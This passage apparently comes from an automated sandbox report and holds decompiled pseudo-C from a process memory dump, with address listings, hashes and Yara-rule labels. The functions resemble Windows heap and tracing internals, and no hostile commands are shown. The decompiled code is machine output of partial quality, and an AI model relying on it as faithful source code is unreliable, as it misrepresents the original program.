					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x4fd7b10 =  *0x4fd7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x4fd536c; // 0x3011040
					if( *_t51 != 0x4fd5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x4fd5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x4fd536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E04F1A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                                                                                                0x04f1a61c
                                                                                                                                0x04f1a61e
                                                                                                                                0x04f1a623
                                                                                                                                0x04f1a628
                                                                                                                                0x04f1a62b
                                                                                                                                0x04f1a62d
                                                                                                                                0x04f1a648
                                                                                                                                0x04f1a64a
                                                                                                                                0x04f1a64f
                                                                                                                                0x04f59b44
                                                                                                                                0x04f1a6ec
                                                                                                                                0x04f1a6f1
                                                                                                                                0x04f1a6f1
                                                                                                                                0x04f1a655
                                                                                                                                0x04f1a657
                                                                                                                                0x04f1a65a
                                                                                                                                0x04f1a65d
                                                                                                                                0x04f1a662
                                                                                                                                0x04f1a663
                                                                                                                                0x04f1a667
                                                                                                                                0x04f1a668
                                                                                                                                0x04f1a66d
                                                                                                                                0x04f1a706
                                                                                                                                0x04f1a706
                                                                                                                                0x04f59bda
                                                                                                                                0x04f59be6
                                                                                                                                0x04f59beb
                                                                                                                                0x00000000
                                                                                                                                0x04f59beb
                                                                                                                                0x04f1a679
                                                                                                                                0x04f59b7a
                                                                                                                                0x00000000
                                                                                                                                0x04f59b7a
                                                                                                                                0x04f1a683
                                                                                                                                0x04f1a6f4
                                                                                                                                0x04f1a6f7
                                                                                                                                0x04f1a6f9
                                                                                                                                0x04f1a6fd
                                                                                                                                0x04f1a6a0
                                                                                                                                0x04f1a6a0
                                                                                                                                0x04f1a6ad
                                                                                                                                0x04f1a6af
                                                                                                                                0x04f1a6b4
                                                                                                                                0x04f59ba7
                                                                                                                                0x04f59bac
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f59bc6
                                                                                                                                0x04f59bce
                                                                                                                                0x04f59bd1
                                                                                                                                0x04f59bd3
                                                                                                                                0x04f59bd3
                                                                                                                                0x00000000
                                                                                                                                0x04f59bd1
                                                                                                                                0x04f1a6bd
                                                                                                                                0x04f1a6c3
                                                                                                                                0x04f1a6c6
                                                                                                                                0x04f1a6d2
                                                                                                                                0x04f1a701
                                                                                                                                0x04f1a704
                                                                                                                                0x00000000
                                                                                                                                0x04f1a704
                                                                                                                                0x04f1a6d4
                                                                                                                                0x04f1a6d6
                                                                                                                                0x04f1a6d9
                                                                                                                                0x04f1a6db
                                                                                                                                0x04f1a6e1
                                                                                                                                0x04f1a6e6
                                                                                                                                0x04f1a6e8
                                                                                                                                0x04f1a6e8
                                                                                                                                0x04f1a6ea
                                                                                                                                0x00000000
                                                                                                                                0x04f1a6ea
                                                                                                                                0x04f1a688
                                                                                                                                0x04f1a692
                                                                                                                                0x04f1a694
                                                                                                                                0x04f1a699
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f1a69d
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 34d7201755efa43a391fde5053ce34c00475a2b39d5834432743e64dbcda6518
                                                                                                                                • Instruction ID: 82d6c240b60ca8982c712758ce1593fffcaf682d60c216b2ad69a5642ef00dd6
                                                                                                                                • Opcode Fuzzy Hash: 34d7201755efa43a391fde5053ce34c00475a2b39d5834432743e64dbcda6518
                                                                                                                                • Instruction Fuzzy Hash: F2415BB5E01209EFDB18CF68D990B99B7F2FF49304F198069E904AB354D775BA02DB50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F67016, Relevance: .1, Instructions: 104COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 76%
                                                                                                                                			E04F67016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x4fdd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04F66B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04F66B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04F07D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04F29AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E04F2B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04F04620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                                                                                0x04f67016
                                                                                                                                0x04f6701e
                                                                                                                                0x04f6702b
                                                                                                                                0x04f67033
                                                                                                                                0x04f67037
                                                                                                                                0x04f6703c
                                                                                                                                0x04f6703e
                                                                                                                                0x04f67041
                                                                                                                                0x04f67045
                                                                                                                                0x04f6704a
                                                                                                                                0x04f67050
                                                                                                                                0x04f67055
                                                                                                                                0x04f6705a
                                                                                                                                0x04f67062
                                                                                                                                0x04f67062
                                                                                                                                0x04f6705a
                                                                                                                                0x04f67064
                                                                                                                                0x04f67064
                                                                                                                                0x04f67067
                                                                                                                                0x04f67071
                                                                                                                                0x04f67096
                                                                                                                                0x04f6709b
                                                                                                                                0x04f670a2
                                                                                                                                0x04f670a6
                                                                                                                                0x04f670a7
                                                                                                                                0x04f670ad
                                                                                                                                0x04f670b3
                                                                                                                                0x04f670b6
                                                                                                                                0x04f670bb
                                                                                                                                0x04f670c3
                                                                                                                                0x04f670c3
                                                                                                                                0x04f670c6
                                                                                                                                0x04f670cd
                                                                                                                                0x04f670dd
                                                                                                                                0x04f670e0
                                                                                                                                0x04f670e2
                                                                                                                                0x04f670e2
                                                                                                                                0x04f670ee
                                                                                                                                0x04f67101
                                                                                                                                0x04f670f0
                                                                                                                                0x04f670f9
                                                                                                                                0x04f670f9
                                                                                                                                0x04f6710a
                                                                                                                                0x04f6710e
                                                                                                                                0x04f67112
                                                                                                                                0x04f67117
                                                                                                                                0x04f67118
                                                                                                                                0x04f67118
                                                                                                                                0x04f670bb
                                                                                                                                0x04f6711d
                                                                                                                                0x04f67123
                                                                                                                                0x04f67131
                                                                                                                                0x04f67131
                                                                                                                                0x04f67136
                                                                                                                                0x04f6713d
                                                                                                                                0x04f6713e
                                                                                                                                0x04f6713f
                                                                                                                                0x04f6714a
                                                                                                                                0x04f6714a
                                                                                                                                0x04f67084
                                                                                                                                0x04f67088
                                                                                                                                0x00000000
                                                                                                                                0x04f6708e
                                                                                                                                0x04f6708e
                                                                                                                                0x04f67092
                                                                                                                                0x00000000
                                                                                                                                0x04f67092

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ccbe3b5686175f7b0073b9301dc130eb4ee80b83275a1a34d151f0c361204261
                                                                                                                                • Instruction ID: d8eac7ffcdc7d9a0be04bef223d0ecbc95bb372423a2fb2ac2cbebca740b70c0
                                                                                                                                • Opcode Fuzzy Hash: ccbe3b5686175f7b0073b9301dc130eb4ee80b83275a1a34d151f0c361204261
                                                                                                                                • Instruction Fuzzy Hash: 3E31A672A04751ABD320EF68CD40A6BB7E9FFC8704F044A29F89587690E730F905CBA5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F0C182, Relevance: .1, Instructions: 104COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 68%
                                                                                                                                			E04F0C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04F07D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E04FB8D34(_v8, _t80);
					}
					E04F02280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E04EFFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E04FB8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E04EFFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E04F2B180();
						if(_a4 != 0) {
							E04F02280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E04F0BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E04F0BB2D(_t16, _t15);
						E04F0B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E04EFFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E04EFFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E04EFFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                                                                                0x04f0c18d
                                                                                                                                0x04f0c18f
                                                                                                                                0x04f0c191
                                                                                                                                0x04f0c19b
                                                                                                                                0x04f0c1a0
                                                                                                                                0x04f0c1d4
                                                                                                                                0x04f0c1de
                                                                                                                                0x04f52d6e
                                                                                                                                0x04f0c1e4
                                                                                                                                0x04f0c1e4
                                                                                                                                0x04f0c1e4
                                                                                                                                0x04f0c1ec
                                                                                                                                0x04f52d7d
                                                                                                                                0x04f52d7d
                                                                                                                                0x04f0c1f3
                                                                                                                                0x04f0c1ff
                                                                                                                                0x04f52d88
                                                                                                                                0x04f52d8d
                                                                                                                                0x04f52d94
                                                                                                                                0x04f52d94
                                                                                                                                0x04f52d9f
                                                                                                                                0x04f52da4
                                                                                                                                0x04f52dab
                                                                                                                                0x04f52db0
                                                                                                                                0x04f52db2
                                                                                                                                0x04f52db3
                                                                                                                                0x04f52db4
                                                                                                                                0x04f52dbc
                                                                                                                                0x04f52dc3
                                                                                                                                0x04f52dc3
                                                                                                                                0x04f0c205
                                                                                                                                0x04f0c205
                                                                                                                                0x04f0c208
                                                                                                                                0x04f0c20e
                                                                                                                                0x04f0c211
                                                                                                                                0x04f0c216
                                                                                                                                0x04f0c219
                                                                                                                                0x04f0c21f
                                                                                                                                0x04f0c222
                                                                                                                                0x04f0c22c
                                                                                                                                0x04f0c234
                                                                                                                                0x04f0c23a
                                                                                                                                0x04f0c23f
                                                                                                                                0x04f0c245
                                                                                                                                0x04f0c24b
                                                                                                                                0x04f0c251
                                                                                                                                0x04f0c25a
                                                                                                                                0x04f0c276
                                                                                                                                0x04f0c27d
                                                                                                                                0x04f0c27d
                                                                                                                                0x04f0c25c
                                                                                                                                0x04f0c25c
                                                                                                                                0x00000000
                                                                                                                                0x04f0c25e
                                                                                                                                0x04f0c1a4
                                                                                                                                0x04f0c1aa
                                                                                                                                0x04f0c1b3
                                                                                                                                0x04f0c265
                                                                                                                                0x04f0c26c
                                                                                                                                0x04f0c26c
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                                • Instruction ID: c9daa1a86487fddf6ac592a17059680c253cfd13463f2771423f3f19850e9511
                                                                                                                                • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                                • Instruction Fuzzy Hash: C1310C72B01586AEE708EBB4C880BE9F754BF82208F04825AD61857381D7347A47E790
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F1A70E, Relevance: .1, Instructions: 96COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 92%
                                                                                                                                			E04F1A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x4fd7b10; // 0x10
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x4fd7b10 = 8;
					 *0x4fd7b14 = 0x4fd7b0c;
					 *0x4fd7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x11
					E04F1A990(0x4fd7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L04F1A840(__edx, __ecx, __ecx, _t52, 0x4fd7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x4fd7b10; // 0x10
					_t3 = _t37 + 0x27; // 0x37
					__eflags = _t3 >> 5 -  *0x4fd7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x4fd7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x37
						_v8 = _t4 >> 5;
						_t50 = L04F04620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x4fd7b18 = _v8;
						_t8 = _t52 + 7; // 0x17
						E04F2F3E0(_t50,  *0x4fd7b14, _t8 >> 3);
						_t28 =  *0x4fd7b14; // 0x771c7b0c
						__eflags = _t28 - 0x4fd7b0c;
						if(_t28 != 0x4fd7b0c) {
							L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x18
						 *0x4fd7b14 = _t50;
						_t48 = _v12;
						 *0x4fd7b10 = _t9;
						goto L6;
					}
					 *0x4fd7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                                                                                0x04f1a713
                                                                                                                                0x04f1a714
                                                                                                                                0x04f1a717
                                                                                                                                0x04f1a71d
                                                                                                                                0x04f1a720
                                                                                                                                0x04f1a722
                                                                                                                                0x04f1a727
                                                                                                                                0x04f1a74a
                                                                                                                                0x04f1a754
                                                                                                                                0x04f1a75e
                                                                                                                                0x04f1a768
                                                                                                                                0x04f1a76a
                                                                                                                                0x04f1a773
                                                                                                                                0x04f1a78b
                                                                                                                                0x04f1a790
                                                                                                                                0x04f1a792
                                                                                                                                0x04f1a741
                                                                                                                                0x04f1a741
                                                                                                                                0x04f1a743
                                                                                                                                0x04f1a749
                                                                                                                                0x04f1a749
                                                                                                                                0x04f1a732
                                                                                                                                0x04f1a73a
                                                                                                                                0x04f1a797
                                                                                                                                0x04f1a79d
                                                                                                                                0x04f1a7a3
                                                                                                                                0x04f1a7a9
                                                                                                                                0x04f1a7b6
                                                                                                                                0x04f1a7bc
                                                                                                                                0x04f1a7ca
                                                                                                                                0x04f1a7e0
                                                                                                                                0x04f1a7e2
                                                                                                                                0x04f1a7e4
                                                                                                                                0x04f59bf2
                                                                                                                                0x00000000
                                                                                                                                0x04f59bf2
                                                                                                                                0x04f1a7ed
                                                                                                                                0x04f1a7f2
                                                                                                                                0x04f1a800
                                                                                                                                0x04f1a805
                                                                                                                                0x04f1a80d
                                                                                                                                0x04f1a812
                                                                                                                                0x04f59c08
                                                                                                                                0x04f59c08
                                                                                                                                0x04f1a818
                                                                                                                                0x04f1a81b
                                                                                                                                0x04f1a821
                                                                                                                                0x04f1a824
                                                                                                                                0x00000000
                                                                                                                                0x04f1a824
                                                                                                                                0x04f1a7ae
                                                                                                                                0x00000000
                                                                                                                                0x04f1a7ae
                                                                                                                                0x04f1a73c
                                                                                                                                0x04f1a73e
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 76058fadf0de365b1cf2d29f26511ca4f6a6d6a30002c91fe704f511f30053b8
                                                                                                                                • Instruction ID: bcb0166091201e1736cd4c735185168d8a475c8667bdd04b2a0dac923fa8652d
                                                                                                                                • Opcode Fuzzy Hash: 76058fadf0de365b1cf2d29f26511ca4f6a6d6a30002c91fe704f511f30053b8
                                                                                                                                • Instruction Fuzzy Hash: CE31A0B2A02208DBD711EB28E880F2577FAEF85718F14495AE8458B258D774BE02CB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F161A0, Relevance: .1, Instructions: 93COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 97%
                                                                                                                                			E04F161A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E04F15E50(0x4ec67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E04FB9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E04EEF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                                                                                0x04f161b3
                                                                                                                                0x04f161b5
                                                                                                                                0x04f161bd
                                                                                                                                0x04f161c3
                                                                                                                                0x04f161c7
                                                                                                                                0x04f161d2
                                                                                                                                0x04f161ff
                                                                                                                                0x04f161ff
                                                                                                                                0x04f16201
                                                                                                                                0x04f16207
                                                                                                                                0x04f16207
                                                                                                                                0x04f161d4
                                                                                                                                0x04f161d9
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f161df
                                                                                                                                0x04f161e2
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f161e6
                                                                                                                                0x04f161e8
                                                                                                                                0x04f161ee
                                                                                                                                0x04f161ee
                                                                                                                                0x04f161f9
                                                                                                                                0x04f5762f
                                                                                                                                0x04f57632
                                                                                                                                0x04f57635
                                                                                                                                0x04f57639
                                                                                                                                0x04f57640
                                                                                                                                0x04f5766e
                                                                                                                                0x04f57675
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f57681
                                                                                                                                0x04f57689
                                                                                                                                0x04f5768d
                                                                                                                                0x04f57691
                                                                                                                                0x04f57695
                                                                                                                                0x04f57699
                                                                                                                                0x04f576af
                                                                                                                                0x04f576b5
                                                                                                                                0x04f576b7
                                                                                                                                0x04f576b7
                                                                                                                                0x04f576d7
                                                                                                                                0x04f576dc
                                                                                                                                0x00000000
                                                                                                                                0x04f576dc
                                                                                                                                0x04f576a2
                                                                                                                                0x04f576a9
                                                                                                                                0x04f57651
                                                                                                                                0x04f57653
                                                                                                                                0x04f57653
                                                                                                                                0x04f57656
                                                                                                                                0x04f57656
                                                                                                                                0x00000000
                                                                                                                                0x04f57656
                                                                                                                                0x04f57644
                                                                                                                                0x04f57646
                                                                                                                                0x04f57648
                                                                                                                                0x04f57648
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a2ee71f44758d61a81a7c141f61f99c76a01fe6daa76b488677e33df294851dd
                                                                                                                                • Instruction ID: 3868da9b455cf0c69bcd1f1d7da23caaed36782c94808ea7a013dbfccf8b6b46
                                                                                                                                • Opcode Fuzzy Hash: a2ee71f44758d61a81a7c141f61f99c76a01fe6daa76b488677e33df294851dd
                                                                                                                                • Instruction Fuzzy Hash: DB317A72A057019FE324EF19C940B26B7E5FB88B00F05496DE998DB361E7B0E805CB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EEAA16, Relevance: .1, Instructions: 93COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 95%
                                                                                                                                			E04EEAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x4fdd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x4fd7b9c; // 0x0
					_t53 = L04F04620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E04F2B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E04F2F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L04EF6C59(_t53, _t51, _t58) != 0) {
							_t28 = E04F15E50(0x4ecc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E04F1B230(_v32, _v28, 0x4ecc2d8, 1,  &_v24);
								_t28 = E04EEF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                                                                                0x04eeaa25
                                                                                                                                0x04eeaa29
                                                                                                                                0x04eeaa2d
                                                                                                                                0x04eeaa30
                                                                                                                                0x04eeaa37
